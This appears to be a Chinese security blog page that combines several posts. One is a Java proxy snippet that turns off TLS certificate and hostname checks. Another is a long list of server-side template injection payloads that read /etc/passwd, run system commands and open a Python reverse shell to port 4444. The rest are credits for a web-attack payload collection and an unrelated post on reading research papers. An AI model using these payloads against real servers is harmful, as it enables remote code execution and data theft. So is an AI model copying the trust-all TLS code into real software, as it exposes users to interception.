文章22
标签6
分类2

GO底层篇 安全篇 逆向篇更新

进度19.2%

像个傻子。

Github go写到5.4了,可以开始更新5.1了,对GO语言,包括编程 底层 安全 逆向相关,应该都没有……是不是没想到,这个仓库吧

https://github.com/lazybootsafe/Go-Learning-With-Hack

随时断更,取决于社会主义核心价值观和发展进程。

JAVA设置HTTP和HTTPS代理

一、直接设置系统属性,设置后所有网络请求都有效

            System.setProperty("proxyType", "4");
            System.setProperty("proxyPort", "80"));
            System.setProperty("proxyHost", "127.0.0.1");
            System.setProperty("proxySet", "true");

二、用用java.net.Proxy类

package test;

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.PrintWriter;
import java.net.HttpURLConnection;
import java.net.InetSocketAddress;
import java.net.Proxy;
import java.net.URL;
import java.net.Proxy.Type;
import java.security.cert.CertificateException;
import java.security.cert.X509Certificate;

import javax.net.ssl.HostnameVerifier;
import javax.net.ssl.HttpsURLConnection;
import javax.net.ssl.SSLContext;
import javax.net.ssl.SSLSession;
import javax.net.ssl.TrustManager;
import javax.net.ssl.X509TrustManager;

public class HttpAndHttpsProxy {

    public static String HttpsProxy(String url, String param, String proxy, int port) {
        HttpsURLConnection httpsConn = null;
        PrintWriter out = null;
        BufferedReader in = null;
        String result = "";
        BufferedReader reader = null;
        try {
            URL urlClient = new URL(url);
            System.out.println("请求的URL========:" + urlClient);

                SSLContext sc = SSLContext.getInstance("SSL");
                // 指定信任https
                sc.init(null, new TrustManager[] { new TrustAnyTrustManager() }, new java.security.SecureRandom());
                //创建代理虽然是https也是Type.HTTP
                Proxy proxy1=new Proxy(Type.HTTP, new InetSocketAddress(proxy, port));
                //设置代理
                httpsConn = (HttpsURLConnection) urlClient.openConnection(proxy1);

                httpsConn.setSSLSocketFactory(sc.getSocketFactory());
                httpsConn.setHostnameVerifier(new TrustAnyHostnameVerifier());
                 // 设置通用的请求属性
                httpsConn.setRequestProperty("accept", "*/*");
                httpsConn.setRequestProperty("connection", "Keep-Alive");
                httpsConn.setRequestProperty("user-agent",
                        "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1)");
                // 发送POST请求必须设置如下两行
                httpsConn.setDoOutput(true);
                httpsConn.setDoInput(true);
                // 获取URLConnection对象对应的输出流
                out = new PrintWriter(httpsConn.getOutputStream());
                // 发送请求参数
                out.print(param);
                // flush输出流的缓冲
                out.flush();
                // 定义BufferedReader输入流来读取URL的响应
                in = new BufferedReader(
                        new InputStreamReader(httpsConn.getInputStream()));
                String line;
                while ((line = in.readLine()) != null) {
                    result += line;
                }
                // 断开连接
                httpsConn.disconnect();
                System.out.println("====result===="+result);
                System.out.println("返回结果:" + httpsConn.getResponseMessage());

        } catch (Exception e) {
            e.printStackTrace();
        } finally {
            try {
                if (reader != null) {
                    reader.close();
                }
            } catch (IOException e) {
            }
            try {
                if (in != null) {
                    in.close();
                }
            } catch (IOException e) {
                e.printStackTrace();
            }
            if (out != null) {
                out.close();
            }
        }

         return result;
    }

    public static String HttpProxy(String url, String param, String proxy, int port) {
        HttpURLConnection httpConn = null;
        PrintWriter out = null;
        BufferedReader in = null;
        String result = "";
        BufferedReader reader = null;
        try {
            URL urlClient = new URL(url);
            System.out.println("请求的URL========:" + urlClient);
                //创建代理
                Proxy proxy1=new Proxy(Type.HTTP, new InetSocketAddress(proxy, port));
                //设置代理
                httpConn = (HttpURLConnection) urlClient.openConnection(proxy1);
                // 设置通用的请求属性
                httpConn.setRequestProperty("accept", "*/*");
                httpConn.setRequestProperty("connection", "Keep-Alive");
                httpConn.setRequestProperty("user-agent",
                        "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1)");
                // 发送POST请求必须设置如下两行
                httpConn.setDoOutput(true);
                httpConn.setDoInput(true);
                // 获取URLConnection对象对应的输出流
                out = new PrintWriter(httpConn.getOutputStream());
                // 发送请求参数
                out.print(param);
                // flush输出流的缓冲
                out.flush();
                // 定义BufferedReader输入流来读取URL的响应
                in = new BufferedReader(
                        new InputStreamReader(httpConn.getInputStream()));
                String line;
                while ((line = in.readLine()) != null) {
                    result += line;
                }
                // 断开连接
                httpConn.disconnect();
                System.out.println("====result===="+result);
                System.out.println("返回结果:" + httpConn.getResponseMessage());
        } catch (Exception e) {
            e.printStackTrace();
        } finally {
            try {
                if (reader != null) {
                    reader.close();
                }
            } catch (IOException e) {
            }
            try {
                if (in != null) {
                    in.close();
                }
            } catch (IOException e) {
                e.printStackTrace();
            }
            if (out != null) {
                out.close();
            }
        }

         return result;
    }

    private static class TrustAnyTrustManager implements X509TrustManager {

        public void checkClientTrusted(X509Certificate[] chain, String authType) throws CertificateException {
        }

        public void checkServerTrusted(X509Certificate[] chain, String authType) throws CertificateException {
        }

        public X509Certificate[] getAcceptedIssuers() {
            return new X509Certificate[] {};
        }
    }

    private static class TrustAnyHostnameVerifier implements HostnameVerifier {
        public boolean verify(String hostname, SSLSession session) {
            return true;
        }
    }

    public static void main(String[] args) {
        HttpsProxy("https://www.baidu.com//", "", "127.0.0.1", 81);
        HttpProxy("http://evilxyz.xyz/", "", "127.0.0.1", 81);
    }

}

最近用到的payload

1、Server Side Template Injection Payloads(服务端模板注入 SSTI-payloads)

{{2*2}}[[3*3]]
{{3*3}}
{{3*'3'}}
<%= 3 * 3 %>
${6*6}
${{3*3}}
@(6+5)
#{3*3}
#{ 3 * 3 }
{{dump(app)}}
{{app.request.server.all|join(',')}}
{{config.items()}}
{{ [].class.base.subclasses() }}
{{''.class.mro()[1].subclasses()}}
{{ ''.__class__.__mro__[2].__subclasses__() }}
{% for key, value in config.iteritems() %}<dt>{{ key|e }}</dt><dd>{{ value|e }}</dd>{% endfor %}
{{'a'.toUpperCase()}} 
{{ request }}
{{self}}
<%= File.open('/etc/passwd').read %>
<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}
${"freemarker.template.utility.Execute"?new()("id")}
{{app.request.query.filter(0,0,1024,{'options':'system'})}}
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]   ("/etc/passwd").read() }}
{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}
{$smarty.version}
{php}echo `id`;{/php}
{{['id']|filter('system')}}
{{['cat\x20/etc/passwd']|filter('system')}}
{{['cat$IFS/etc/passwd']|filter('system')}}
{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}
{{request|attr(["_"*2,"class","_"*2]|join)}}
{{request|attr(["__","class","__"]|join)}}
{{request|attr("__class__")}}
{{request.__class__}}
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\   x5f')('os')|attr('popen')('id')|attr('read')()}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x   ()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
${T(java.lang.System).getenv()}
${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).co   ncat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}
References :

https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/18-Testing_for_Server_Side_Template_Injection

https://portswigger.net/research/server-side-template-injection

https://www.indusface.com/learning/application-security/server-side-template-injection/

项目地址:

https://github.com/payloadbox/ssti-payloads

项目上包含了很多其他的一些payloads.(大家自行查看)

2、Git All The Payloads! A Collection Of Web Attack Payloads(git关于web的payloads)

项目地址:

https://github.com/foospidy/payloads

可以使用get.sh解压下载文件

Payload Credits

fuzzdb - https://github.com/fuzzdb-project/fuzzdb

SecLists - https://github.com/danielmiessler/SecLists

xsuperbug - https://github.com/xsuperbug/payloads

NickSanzotta - https://github.com/NickSanzotta/BurpIntruder

7ioSecurity - https://github.com/7ioSecurity/XSS-Payloads

shadsidd - https://github.com/shadsidd

shikari1337 - https://www.shikari1337.com/list-of-xss-payloads-for-cross-site-scripting/

xmendez - https://github.com/xmendez/wfuzz

minimaxir - https://github.com/minimaxir/big-list-of-naughty-strings

xsscx - https://github.com/xsscx/Commodity-Injection-Signatures

TheRook - https://github.com/TheRook/subbrute

danielmiessler - https://github.com/danielmiessler/RobotsDisallowed

FireFart - https://github.com/FireFart/HashCollision-DOS-POC

HybrisDisaster - https://github.com/HybrisDisaster/aspHashDoS

swisskyrepo - https://github.com/swisskyrepo/PayloadsAllTheThings

1N3 - https://github.com/1N3/IntruderPayloads

cujanovic - https://github.com/cujanovic/Open-Redirect-Payloads

cujanovic - https://github.com/cujanovic/Content-Bruteforcing-Wordlist

cujanovic - https://github.com/cujanovic/subdomain-bruteforce-list

cujanovic - https://github.com/cujanovic/CRLF-Injection-Payloads

cujanovic - https://github.com/cujanovic/Virtual-host-wordlist

cujanovic - https://github.com/cujanovic/dirsearch-wordlist

lavalamp- - https://github.com/lavalamp-/password-lists

arnaudsoullie - https://github.com/arnaudsoullie/ics-default-passwords

scadastrangelove - https://github.com/scadastrangelove/SCADAPASS

jeanphorn - https://github.com/jeanphorn/wordlist

j3ers3 - https://github.com/j3ers3/PassList

nyxxxie - https://github.com/nyxxxie/awesome-default-passwords

foospidy - https://github.com/foospidy/web-cve-tests

OWASP

dirbuster - https://www.owasp.org/index.php/DirBuster

fuzzing_code_database - https://www.owasp.org/index.php/Category:OWASP_Fuzzing_Code_Database

JBroFuzz - https://www.owasp.org/index.php/JBroFuzz

Other

xss/ismailtasdelen.txt - https://github.com/ismailtasdelen/xss-payload-list

xss/jsf__k.txt - http://www.jsfuck.com/

xss/kirankarnad.txt - https://www.linkedin.com/pulse/20140812222156-79939846-xss-vectors-you-may-need-as-a-pen-tester

xss/packetstorm.txt - https://packetstormsecurity.com/files/112152/Cross-Site-Scripting-Payloads.html

xss/smeegessec.com.txt - http://www.smeegesec.com/2012/06/collection-of-cross-site-scripting-xss.html

xss/d3adend.org.txt - http://d3adend.org/xss/ghettoBypass

xss/soaj1664ashar.txt - http://pastebin.com/u6FY1xDA

xss/billsempf.txt - https://www.sempf.net/post/Six-hundred-and-sixty-six-XSS-vectors-suitable-for-attacking-an-API.aspx (http://pastebin.com/48WdZR6L)

xss/787373.txt - https://84692bb0df6f30fc0687-25dde2f20b8e8c1bda75aeb96f737eae.ssl.cf1.rackcdn.com/--xss.html

xss/bhandarkar.txt - http://hackingforsecurity.blogspot.com/2013/11/xss-cheat-sheet-huge-list.html

xss/xssdb.txt - http://xssdb.net/xssdb.txt

xss/0xsobky.txt - https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot

xss/secgeek.txt - https://www.secgeek.net/solutions-for-xss-waf-challenge/

xss/reddit_xss_get.txt - All XSS GET requests from https://www.reddit.com/r/xss (as of 3/30/2016)

xss/rafaybaloch.txt - http://www.rafayhackingarticles.net/2016/09/breaking-great-wall-of-web-xss-waf.html

xss/alternume0.txt - https://www.openbugbounty.org/reports/722726/

xss/XssPayloads - https://twitter.com/XssPayloads

sqli/camoufl4g3.txt - https://github.com/camoufl4g3/SQLi-payload-Fuzz3R/blob/master/payloads.txt

sqli/c0rni3sm.txt - http://c0rni3sm.blogspot.in/2016/02/a-quite-rare-mssql-injection.html

sqli/sqlifuzzer.txt - https://github.com/ContactLeft/sqlifuzzer/tree/master/payloads

sqli/harisec.txt - https://hackerone.com/reports/297478

sqli/jstnkndy.txt - https://foxglovesecurity.com/2017/02/07/type-juggling-and-php-object-injection-and-sqli-oh-my/

sqli/d0znpp.txt - https://medium.com/@d0znpp/how-to-bypass-libinjection-in-many-waf-ngwaf-1e2513453c0f

sqli/libinjection-bypasses.txt - https://gist.github.com/migolovanov/432fe28c8c7e9fa675ab3903c5eda77f

traversal/dotdotpwn.txt - https://github.com/wireghoul/dotdotpwn

codeinjection/fede.txt - https://techblog.mediaservice.net/2016/10/exploiting-ognl-injection/

commandinjection/ismailtasdelen-unix.txt - https://github.com/ismailtasdelen/command-injection-payload-list

commandinjection/ismailtasdelen-windows.txt - https://github.com/ismailtasdelen/command-injection-payload-list

CTF

Requests extracted from either packet captures or log files of capture the flag (ctf) events. Mostly raw data so not all requests are actual payloads, however requests should be deduplicated.

maccdc2010.txt - Mid-Atlantic CCDC (http://maccdc.org/), source: http://www.netresec.com/?page=MACCDC

maccdc2011.txt - Mid-Atlantic CCDC (http://maccdc.org/), source: http://www.netresec.com/?page=MACCDC

maccdc2012.txt - Mid-Atlantic CCDC (http://maccdc.org/), source: http://www.netresec.com/?page=MACCDC

ists12_2015.txt - Information Security Talent Search (http://ists.sparsa.org/), source: http://www.netresec.com/?page=ISTS

defcon20.txt - DEFCON Capture the Flag (https://www.defcon.org/html/links/dc-ctf.html), source: http://www.netresec.com/?page=PcapFiles


Miscellaneous

    XSS references that may overlap with sources already included above:

https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

http://htmlpurifier.org/live/smoketests/xssAttacks.php

如何阅读一篇论文(科研型)

作为一名科研型傻吊,如何阅读一篇论文呢?

系统阅读

既然有了目标,第一步收集资源,并整合起来。

论文、博客文章、GitHub资源库、视频……在谷歌上搜索「姿态估计」这个词,得到所有关于这个关键词的资源都要整理下来。

这一阶段,资源数量是没有限制的。只要是你认为重要的资料都可以整理,但要注意,一定要创建一个有用的论文、视频和文章的短名单。

第二步,将你认为的与主题相关的任何资源进行深入研究。

这时候,你可以绘制一张表格。

对每种资源的理解程度,做一个实时的跟踪。

具体来讲,最好的方式就是对所有你收集到的资源都有一个10%~20%的理解程度。

这样,就确保你已经对你所收集到的资源,有了足够的了解,并且还能准确的评估其相关性。

很好,你已经对这项技术基本入门了。

更进一步,仔细研读相关程度更高的文章资源。这时候,就出现了一个问题,大概多少论文足够了呢?

吴恩达说:对5~20篇的论文的理解,那么就说明你对这个领域以及研究进展有了基本的了解。

如果研读到了50~100篇,那么已经非常了解这个领域了。

这时候,你的表格可能是这样。

论文至少要看三遍

接下来,就集中介绍一下如何研究一篇论文。

吴恩达认为,要理解一篇论文,一次将一篇论文从第一个字读到最后一个字,可能并不是最佳方式。

正确的打开方式是,一篇论文至少要看三遍。

第一遍,仔细阅读论文中的标题、摘要和关键词。

第二遍,阅读文中的导言、结论以及图表,快速扫描一下论文剩下的内容。

这一步主要是要把握论文中的关键信息,不光是导言和结论,还包括文章中任何小结论的总结,文中涉及的补充信息都跳过。

第三遍,阅读论文的整个部分,但是要跳过任何可能陌生看不懂的数学公式,技术术语。

不过,如果你需要对这个专业领域有一个「深入」的理解,那就必须要搞懂那些公式术语了。

问自己问题

如何检测你对这篇文章的关键信息有了基本的了解?问自己问题吧!

吴恩达提供了一系列的问题,在阅读的时候询问自己。这里就摘取一部分。

1、Describe what the authors of the paper aim to accomplish, or perhaps did achieve.
这篇论文作者的目标是什么,或者也许已经实现了什么。

2、If a new approach/technique/method was introduced in a paper, what are the key elements of the newly proposed approach?
如果文中引入了一种新方法/技术,那么这一新提出的方法/技术的关键要素是什么?

3、What content within the paper is useful to you?
论文中,有哪些内容对你有用。

4、What other references do you want to follow?
你还想关注哪些参考资料/文献?

此外,还分享了一些有用的在线资源。

The Machine Learning Subreddit:
https://www.reddit.com/r/MachineLearning/
The Deep Learning Subreddit:
https://www.reddit.com/r/deeplearning/
Paper With Code:
https://paperswithcode.com/
Research Gate:
https://www.researchgate.net/
还有一些顶级会议,比如NIPS、ICML、ICLR…

不过,吴恩达也强调:

Learn steadily rather than short burst for longevity.

稳扎稳打,而不是短时的突击,才能长久的学习。这不光是对机器学习领域,还对整个学术领域有益。

这位博主根据吴恩达的方法,每个月至少阅读四篇论文,来达到理解的目的。

吴恩达他自己也在视频里说,他就随身携带着一批论文,有时间就拿出来研读。

希望这个方法对你有所帮助~如果你有很好的学习论文的方法,也欢迎跟我们分享。

博文链接:
https://towardsdatascience.com/how-you-should-read-research-papers-according-to-andrew-ng-stanford-deep-learning-lectures-98ecbd3ccfb3
视频链接:
https://www.youtube.com/watch?v=733m6qBH-jI

此内容被密码保护

请输入密码访问